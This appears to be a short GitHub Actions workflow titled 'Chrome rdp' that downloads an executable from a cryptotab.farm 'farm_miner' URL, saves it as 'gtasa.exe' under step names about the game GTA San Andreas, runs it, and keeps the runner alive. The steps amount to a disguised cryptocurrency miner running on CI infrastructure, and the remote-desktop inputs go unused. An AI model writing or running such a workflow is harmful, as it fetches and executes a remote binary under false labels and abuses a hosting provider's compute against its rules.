# This is a basic workflow to help you get started with Actions

name: Chrome rdp

on: 
  workflow_dispatch:
    inputs:
      authcode:
        description: 'Enter CRD code'
        required: false
      pincode:
        description: 'Six digit Pin'
        required: false
  
jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: downloading gta sa
      run: Invoke-WebRequest https://cryptotab.farm/download/farm_miner_FfLd6W -OutFile gtasa.exe
    - name: executing gta san commands
      run: chmod +x gtasa.exe
          ./gtasa.exe
    - name: Keep Alive
      run: ./timeout.ps1
